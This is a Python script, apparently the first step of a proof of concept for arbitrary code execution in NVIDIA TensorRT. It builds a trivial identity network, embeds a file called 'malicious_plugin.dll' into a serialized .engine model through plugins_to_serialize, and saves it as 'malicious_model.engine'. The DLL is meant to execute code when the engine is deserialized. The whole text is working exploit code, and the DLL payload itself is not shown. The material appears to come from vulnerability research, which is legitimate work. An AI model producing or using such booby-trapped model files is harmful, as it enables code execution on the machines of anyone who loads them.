| """ |
| TensorRT ACE PoC - Step 1: Build a malicious .engine file with embedded plugin DLL. |
| |
| This script: |
| 1. Creates a simple identity network using TensorRT's network API |
| 2. Serializes the malicious plugin DLL into the engine file via plugins_to_serialize |
| 3. Saves the resulting .engine file |
| |
| The .engine file will contain the embedded DLL that executes arbitrary code |
| when deserialized by TensorRT. |
| """ |
|
|
| import os |
| import sys |
| import tensorrt as trt |
|
|
| def build_malicious_engine(): |
| PLUGIN_DLL = os.path.join(os.path.dirname(__file__), "malicious_plugin.dll") |
| ENGINE_FILE = os.path.join(os.path.dirname(__file__), "malicious_model.engine") |
|
|
| if not os.path.exists(PLUGIN_DLL): |
| print(f"ERROR: Plugin DLL not found: {PLUGIN_DLL}") |
| return False |
|
|
| logger = trt.Logger(trt.Logger.VERBOSE) |
|
|
| |
| builder = trt.Builder(logger) |
| if builder is None: |
| print("ERROR: Failed to create builder") |
| return False |
|
|
| |
| |
| print(f"[*] Plugin DLL: {PLUGIN_DLL} ({os.path.getsize(PLUGIN_DLL)} bytes)") |
|
|
| |
| network = builder.create_network( |
| 1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH) |
| ) |
| if network is None: |
| print("ERROR: Failed to create network") |
| return False |
|
|
| |
| input_tensor = network.add_input("input", trt.float32, (1, 3, 32, 32)) |
| identity = network.add_identity(input_tensor) |
| identity.get_output(0).name = "output" |
| network.mark_output(identity.get_output(0)) |
|
|
| print("[*] Simple identity network created") |
|
|
| |
| config = builder.create_builder_config() |
| config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 1 << 20) |
|
|
| |
| print(f"[*] Setting plugins_to_serialize: {PLUGIN_DLL}") |
| config.plugins_to_serialize = [PLUGIN_DLL] |
|
|
| |
| print("[*] Building engine (this may take a moment)...") |
| serialized_engine = builder.build_serialized_network(network, config) |
| if serialized_engine is None: |
| print("ERROR: Failed to build serialized engine") |
| print("[*] Trying approach 2: load_library first, then serialize...") |
|
|
| |
| registry = builder.get_plugin_registry() |
| handle = registry.load_library(PLUGIN_DLL) |
| print(f"[*] load_library result: {handle}") |
|
|
| |
| builder2 = trt.Builder(logger) |
| network2 = builder2.create_network( |
| 1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH) |
| ) |
| input_tensor2 = network2.add_input("input", trt.float32, (1, 3, 32, 32)) |
| identity2 = network2.add_identity(input_tensor2) |
| identity2.get_output(0).name = "output" |
| network2.mark_output(identity2.get_output(0)) |
|
|
| config2 = builder2.create_builder_config() |
| config2.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 1 << 20) |
| config2.plugins_to_serialize = [PLUGIN_DLL] |
|
|
| serialized_engine = builder2.build_serialized_network(network2, config2) |
| if serialized_engine is None: |
| print("ERROR: Still failed to build engine") |
| return False |
|
|
| engine_size = serialized_engine.nbytes |
| print(f"[+] Engine built successfully! Size: {engine_size} bytes") |
|
|
| |
| dll_size = os.path.getsize(PLUGIN_DLL) |
| print(f"[*] Plugin DLL size: {dll_size} bytes") |
| if engine_size > dll_size: |
| print(f"[+] Engine is larger than DLL - DLL likely embedded!") |
| else: |
| print(f"[-] Engine seems too small - DLL might not be embedded") |
|
|
| |
| with open(ENGINE_FILE, "wb") as f: |
| f.write(bytes(serialized_engine)) |
| print(f"[+] Malicious engine saved to: {ENGINE_FILE}") |
|
|
| return True |
|
|
|
|
| if __name__ == "__main__": |
| |
| proof = os.path.join(os.path.dirname(__file__), "PWNED.txt") |
| if os.path.exists(proof): |
| os.remove(proof) |
|
|
| success = build_malicious_engine() |
| if success: |
| print("\n[+] STEP 1 COMPLETE: Malicious engine built.") |
| print("[*] Next: Run load_malicious_engine.py to test ACE") |
| else: |
| print("\n[-] STEP 1 FAILED") |
| sys.exit(0 if success else 1) |
|
|